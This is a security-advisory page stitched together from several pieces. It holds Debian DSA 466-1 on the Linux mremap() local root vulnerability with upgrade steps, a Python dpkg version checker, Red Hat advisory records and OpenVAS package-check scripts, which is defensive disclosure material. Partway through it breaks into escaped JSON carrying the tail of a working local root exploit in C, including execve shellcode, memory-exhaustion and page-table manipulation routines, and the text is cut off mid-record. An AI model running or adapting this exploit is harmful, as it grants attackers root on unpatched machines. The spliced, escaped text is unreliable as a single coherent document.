[SECURITY] [DSA 466-1] New Linux 2.2.10 packages fix local root exploit (powerpc/apus)
2004-03-18T00:00:00
ID: DEBIAN:DSA-466-1:EA90F   Type: debian   Reporter: Debian   Modified: 2004-03-18T00:00:00
Description
Debian Security Advisory DSA 466-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
March 18th, 2004                        http://www.debian.org/security/faq
Package : kernel-source-2.2.10, kernel-image-2.2.10-powerpc-apus
Vulnerability : failing function and TLB flush
Problem-Type : local
Debian-specific: no
CVE ID : CAN-2004-0077
CERT advisory : VU#981222
Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical
security vulnerability in the memory management code of Linux inside
the mremap(2) system call. Due to flushing the TLB (Translation
Lookaside Buffer, an address cache) too early, it is possible for an
attacker to trigger a local root exploit.
The attack vectors for the 2.4.x and 2.2.x kernels are specific to their
respective kernel series, though. We formerly believed that the
vulnerability exploitable in 2.4.x does not exist in 2.2.x, which is
still true. However, it turned out that a second (sort of)
vulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a
different exploit.
For the stable distribution (woody) this problem has been fixed in
version 2.2.10-13woody1 of the 2.2 kernel images for the powerpc/apus
architecture and in version 2.2.10-2 of the Linux 2.2.10 source.
For the unstable distribution (sid) this problem will be fixed soon
with the 2.4.20 kernel-image package for powerpc/apus. The old 2.2.10
kernel image will be removed from Debian unstable.
You are strongly advised to switch to the fixed 2.4.17 kernel-image
package for powerpc/apus from woody until the 2.4.20 kernel-image
package is fixed in the unstable distribution.
We recommend that you upgrade your Linux kernel package.
Upgrade Instructions

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
These files will probably be moved into the stable distribution on
its next revision.
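The fixed versions named above are what an administrator compares an installed system against, before and after the upgrade. As an added example that is not part of the advisory, the following Python reimplements dpkg's version ordering (epoch, then upstream version, then Debian revision, with '~' sorting lowest) and flags packages that are still below the fixed versions in a listing of the form printed by `dpkg-query -W -f='${Package} ${Version}\n'`. The listing in the block is constructed, and kernel-image-2.2.10-apus is the binary package built from the kernel-image-2.2.10-powerpc-apus source package.

```python
# Fixed versions stated in DSA 466-1. kernel-image-2.2.10-apus is the binary
# package built from the kernel-image-2.2.10-powerpc-apus source package.
FIXED_VERSIONS = {
    "kernel-image-2.2.10-apus": "2.2.10-13woody1",
    "kernel-source-2.2.10": "2.2.10-2",
}

def _weight(c):
    """dpkg's weight for characters in non-digit runs ('' marks end of string):
    letters sort before other characters and '~' before everything."""
    if c == "" or c.isdigit():
        return 0
    if c.isalpha():
        return ord(c)
    if c == "~":
        return -1
    return ord(c) + 256

def _cmp_fragment(a, b):
    """Compare one upstream-version or revision string the way dpkg does:
    alternating non-digit runs (by weight) and digit runs (numerically)."""
    i = j = 0
    while i < len(a) or j < len(b):
        while (i < len(a) and not a[i].isdigit()) or (j < len(b) and not b[j].isdigit()):
            wa = _weight(a[i] if i < len(a) else "")
            wb = _weight(b[j] if j < len(b) else "")
            if wa != wb:
                return wa - wb
            i += 1
            j += 1
        while i < len(a) and a[i] == "0":  # leading zeros do not count
            i += 1
        while j < len(b) and b[j] == "0":
            j += 1
        first_diff = 0
        while i < len(a) and a[i].isdigit() and j < len(b) and b[j].isdigit():
            if first_diff == 0:
                first_diff = ord(a[i]) - ord(b[j])
            i += 1
            j += 1
        if i < len(a) and a[i].isdigit():
            return 1  # a has more digits left, so it is the larger number
        if j < len(b) and b[j].isdigit():
            return -1
        if first_diff != 0:
            return first_diff
    return 0

def parse_version(version):
    """Split '[epoch:]upstream[-revision]' into (epoch, upstream, revision)."""
    epoch = 0
    if ":" in version:
        epoch_str, version = version.split(":", 1)
        epoch = int(epoch_str)
    if "-" in version:
        upstream, revision = version.rsplit("-", 1)
    else:
        upstream, revision = version, ""
    return epoch, upstream, revision

def compare_versions(a, b):
    """Return -1, 0 or 1 as a is lower than, equal to or higher than b."""
    ea, ua, ra = parse_version(a)
    eb, ub, rb = parse_version(b)
    if ea != eb:
        return -1 if ea < eb else 1
    for x, y in ((ua, ub), (ra, rb)):
        r = _cmp_fragment(x, y)
        if r != 0:
            return -1 if r < 0 else 1
    return 0

def is_affected(package, installed):
    """True if installed is below the fixed version, False if at or above it,
    None if the advisory does not cover the package."""
    fixed = FIXED_VERSIONS.get(package)
    if fixed is None:
        return None
    return compare_versions(installed, fixed) < 0

def vulnerable_packages(listing):
    # Lines look like the output of: dpkg-query -W -f='${Package} ${Version}\n'
    hits = []
    for line in listing.splitlines():
        parts = line.split()
        if len(parts) == 2 and is_affected(parts[0], parts[1]):
            hits.append((parts[0], parts[1]))
    return hits

# Constructed sample listing, not real system output: a kernel image that predates
# the fix, a source package already at the fixed version and an unrelated package.
SAMPLE_LISTING = """\
kernel-image-2.2.10-apus 2.2.10-13
kernel-source-2.2.10 2.2.10-2
libc6 2.2.5-11.8
"""

if __name__ == "__main__":
    for pkg, ver in vulnerable_packages(SAMPLE_LISTING):
        print(f"{pkg} {ver} is below fixed version {FIXED_VERSIONS[pkg]}")
```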
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
movl %1, %%ebx \\n\" \n\" movl %2, %%ecx \\n\" \n\" movl %3, %%edx \\n\" \n\" movl $\"xstr(__NR_execve)\", %%eax \\n\" \n\" int $0x80 \\n\" \n: \"=a\"(ret) \n: \"m\"(suid), \"m\"(argv), \"m\"(env) \n); \n} \n \n \nstatic inline void pte_populate(unsigned addr) \n{ \nunsigned r; \nchar *ptr; \n \nmemset((void*)addr, 0x90, PAGE_SIZE); \nr = ((unsigned)suid_code_end) - ((unsigned)suid_code); \nptr = (void*) (addr + PAGE_SIZE); \nptr -= r+1; \nmemcpy(ptr, suid_code, r); \nmemcpy((void*)addr, launch, strlen(launch)+1); \n} \n \n \n// hit VMA limit & populate PTEs \nstatic void exhaust(void) \n{ \n// mmap PTE donor \nt = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE, \nMAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); \nif(MAP_FAILED==t) \ngoto failed; \n \n// prepare shell code pages \nfor(i=2; i<LINKERPAGES+1; i++) \npte_populate(victim + PAGE_SIZE*i); \ni = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ); \nif(i) \ngoto failed; \n \n// lock unmap \nbase = MMAP_BASE; \ncnt = 0; \nprot = PROT_READ; \nprintf(\"\\n\"); fflush(stdout); \nfor(;;) { \nt = mmap((void*)base, PAGE_SIZE, prot, \nMAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); \nif(MAP_FAILED==t) { \nif(ENOMEM==errno) \nbreak; \nelse \ngoto failed; \n} \nif( !(cnt%512) || cnt>65520 ) \nprintf(\"\\r MMAP #%d 0x%.8x - 0x%.8lx\", cnt, base, \nbase+PAGE_SIZE); fflush(stdout); \nbase += PAGE_SIZE; \nprot ^= PROT_EXEC; \ncnt++; \n} \n \n// move PTEs & populate page table cache \nret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE, \nMREMAP_FIXED|MREMAP_MAYMOVE, VICTIM); \nif(-1==ret) \ngoto failed; \n \nmunmap((void*)MMAP_BASE, old_esp-MMAP_BASE); \nt = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE, \nPROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, \n0); \nif(MAP_FAILED==t) \ngoto failed; \n \n*t = *((unsigned *)old_esp); \nmunmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE)); \nprintf(\"\\n[+] Success\\n\\n\"); fflush(stdout); \nreturn; \n \nfailed: 
\nprintf(\"\\n[-] Failed\\n\"); fflush(stdout); \n_exit(0); \n} \n \n \nstatic inline void check_kver(void) \n{ \nstatic struct utsname un; \nint a=0, b=0, c=0, v=0, e=0, n; \n \nuname(&un); \nn=sscanf(un.release, \"%d.%d.%d\", &a, &b, &c); \nif(n!=3 || a!=2) { \nprintf(\"\\n[-] invalid kernel version string\\n\"); \n_exit(0); \n} \n \nif(b==2) { \nif(c<=25) \nv=1; \n} \nelse if(b==3) { \nif(c<=99) \nv=1; \n} \nelse if(b==4) { \nif(c>18 && c<=24) \nv=1, e=1; \nelse if(c>24) \nv=0, e=0; \nelse \nv=1, e=0; \n} \nelse if(b==5 && c<=75) \nv=1, e=1; \nelse if(b==6 && c<=2) \nv=1, e=1; \n \nprintf(\"\\n[+] kernel %s vulnerable: %s exploitable %s\", \nun.release, v? \"YES\" : \"NO\", e? \"YES\" : \"NO\" ); \nfflush(stdout); \n \nif(v && e) \nreturn; \n_exit(0); \n} \n \n \nint main(int ac, char **av) \n{ \n// prepare \ncheck_kver(); \nmemset(env, 0, sizeof(env)); \nmemset(argv, 0, sizeof(argv)); \nif(ac>1) suid=av[1]; \nif(ac>2) launch=av[2]; \nargv[0] = suid; \nget_esp(); \n \n// mmap & clone & execve \nexhaust(); \ncloneme(); \nif(!pid) { \nmy_execve(); \n} else { \nwaitpid(pid, 0, 0); \n} \n \nreturn 0; \n} \n \n- -- \nPaul Starzetz \niSEC Security Research \nhttp://isec.pl/ \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.7 (GNU/Linux) \n \niD8DBQFAQ3a/C+8U3Z5wpu4RAtOFAKCtT8EM9zn5n/maQlSwTZu2wkdHawCfYlht \nWdUJcKDwAzO44Dpmc9IqiEs= \n=mMKN \n-----END PGP SIGNATURE----- \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/32797/isec-0014-mremap-unmap.v2.txt"}], "redhat": [{"lastseen": "2019-08-13T18:46:36", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "description": "The Linux kernel handles the basic functions of the operating\nsystem.\n\nPaul Starzetz discovered a flaw in return value checking in mremap() in the\nLinux kernel versions 2.4.24 and previous that may allow a local attacker\nto gain root privileges. 
No exploit is currently available; however this\nissue is exploitable. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2004-0077 to this issue.\n\nAll users are advised to upgrade to these errata packages, which contain\nbackported security patches that correct these issues. \n\nRed Hat would like to thank Paul Starzetz from ISEC for reporting this issue.\n\nFor the IBM S/390 and IBM eServer zSeries architectures, the upstream\nversion of the s390utils package (which fixes a bug in the zipl\nbootloader) is also included.", "modified": "2017-07-29T20:33:24", "published": "2004-02-20T05:00:00", "id": "RHSA-2004:066", "href": "https://access.redhat.com/errata/RHSA-2004:066", "type": "redhat", "title": "(RHSA-2004:066) kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:32:42", "bulletinFamily": "unix", "cvelist": ["CVE-2003-1040", "CVE-2004-0010", "CVE-2004-0077"], "description": "The Linux kernel handles the basic functions of the operating\nsystem.\n\nPaul Starzetz discovered a flaw in return value checking in mremap() in the\nLinux kernel versions 2.4.24 and previous that may allow a local attacker\nto gain root privileges. No exploit is currently available; however this\nissue is exploitable. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2004-0077 to this issue.\n\nArjan van de Ven discovered a flaw in ncp_lookup() in ncpfs that could\nallow local privilege escalation. ncpfs is only used to allow a system to\nmount volumes of NetWare servers or print to NetWare printers. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2004-0010 to this issue.\n\nAll users are advised to upgrade to these errata packages, which contain\nbackported security patches that correct these issues. 
\n\nRed Hat would like to thank Paul Starzetz from ISEC for reporting this\nissue CAN-2004-0077.", "modified": "2018-03-14T19:26:52", "published": "2004-03-05T05:00:00", "id": "RHSA-2004:069", "href": "https://access.redhat.com/errata/RHSA-2004:069", "type": "redhat", "title": "(RHSA-2004:069) kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:09", "bulletinFamily": "unix", "cvelist": ["CVE-2002-1574", "CVE-2003-1040", "CVE-2004-0003", "CVE-2004-0010", "CVE-2004-0077", "CVE-2004-0109"], "description": "The Linux kernel handles the basic functions of the operating system.\n\nThis kernel updates several important drivers and fixes a number of bugs\nincluding potential security vulnerabilities.\n\niDefense reported a buffer overflow flaw in the ISO9660 filesystem code.\nAn attacker could create a malicious filesystem in such a way that root\nprivileges may be obtained if the filesystem is mounted. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2004-0109 to this issue.\n\nA flaw in return value checking in mremap() in the Linux kernel versions\n2.4.24 and previous that may allow a local attacker to gain root\nprivileges. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2004-0077 to this issue.\n\nA flaw in ncp_lookup() in ncpfs could allow local privilege escalation.\nThe ncpfs module allows a system to mount volumes of NetWare servers or\nprint to NetWare printers. This is part of the kernel-unsupported package.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CAN-2004-0010 to this issue.\n\nA flaw in the R128 Direct Render Infrastructure could allow local privilege\nescalation. This driver is part of the kernel-unsupported package. 
The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has assigned\nthe name CAN-2004-0003 to this issue.\n\nAn overflow was found in the ixj telephony card driver in Linux kernels\nprior to 2.4.20. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2002-1574 to this issue.\n\nThe following drivers were updated:\n\nIBM Serveraid 6.11.07\nMPT fusion v. 2.05.11.03\nQlogic v. 6.07.02-RH1\n\nAll users are advised to upgrade to these errata packages, which contain\nbackported security patches that correct these issues.", "modified": "2018-03-14T19:27:37", "published": "2004-04-21T04:00:00", "id": "RHSA-2004:106", "href": "https://access.redhat.com/errata/RHSA-2004:106", "type": "redhat", "title": "(RHSA-2004:106) kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:49:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is missing an update to kernel-source-2.2.19, kernel-patch-2.2.19-arm, kernel-image-2.2.19-netwinder, kernel-image-2.2.19-riscpc\nannounced via advisory DSA 456-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53154", "href": "http://plugins.openvas.org/nasl.php?oid=53154", "type": "openvas", "title": "Debian Security Advisory DSA 456-1 (kernel)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_456_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 456-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. 
However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 20040303 of 2.2 kernel images for the arm architecture.\n\nFor the unstable distribution (sid) this problem will be fixed soon\nfor the architectures that still ship a 2.2.x kernel package.\n\nWe recommend that you upgrade your Linux kernel package.\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.2.19, kernel-patch-2.2.19-arm, kernel-image-2.2.19-netwinder, kernel-image-2.2.19-riscpc\nannounced via advisory DSA 456-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20456-1\";\n\nif(description)\n{\n script_id(53154);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9686);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 456-1 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.2.19\", ver:\"2.2.19.1-4woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.2.19\", ver:\"2.2.19.1-4woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.2.19-arm\", ver:\"20040303\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.19\", ver:\"20040303\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.19-netwinder\", ver:\"20040303\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.19-riscpc\", ver:\"20040303\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is missing an update to kernel-source-2.2.20, kernel-image-2.2-sparc\nannounced via advisory DSA 514-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53205", "href": "http://plugins.openvas.org/nasl.php?oid=53205", "type": "openvas", "title": "Debian 
Security Advisory DSA 514-1 (kernel-source-2.2.20, kernel-image-2.2-sparc)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_514_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 514-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. 
However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 9woody1 of Linux 2.2 kernel images for the sparc architecture\nand in version 2.2.20-5woody3 of Linux 2.2.20 source.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 9.1 of Linux 2.2 kernel images for the sparc architecture.\n\nThis problem has been fixed for other architectures already.\n\nWe recommend that you upgrade your Linux kernel package.\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.2.20, kernel-image-2.2-sparc\nannounced via advisory DSA 514-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20514-1\";\n\nif(description)\n{\n script_id(53205);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:45:44 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9686);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 514-1 (kernel-source-2.2.20, kernel-image-2.2-sparc)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.2.20\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.2.20\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.20-sparc\", ver:\"9woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-sun4cdm\", ver:\"9woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-sun4dm-smp\", ver:\"9woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-sun4u\", ver:\"9woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-sun4u-smp\", ver:\"9woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is missing an update to kernel-image-2.4.17-ia64\nannounced via advisory DSA 444-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": 
"OPENVAS:53143", "href": "http://plugins.openvas.org/nasl.php?oid=53143", "type": "openvas", "title": "Debian Security Advisory DSA 444-1 (kernel-image-2.4.17-ia64)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_444_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 444-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. 
Due to missing function return value check\nof internal functions a local attacker can gain root privileges.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 011226.16 of ia64 kernel source and images.\n\nOther architectures are or will be mentioned in a separate advisory\nrespectively or are not affected (m68k).\n\nFor the unstable distribution (sid) this problem will be fixed in version\n2.4.24-3.\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\";\ntag_summary = \"The remote host is missing an update to kernel-image-2.4.17-ia64\nannounced via advisory DSA 444-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20444-1\";\n\nif(description)\n{\n script_id(53143);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9686);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 444-1 (kernel-image-2.4.17-ia64)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.4.17-ia64\", ver:\"011226.16\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.17-ia64\", ver:\"011226.16\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-itanium\", ver:\"011226.16\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-itanium-smp\", ver:\"011226.16\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-mckinley\", ver:\"011226.16\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-mckinley-smp\", ver:\"011226.16\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is 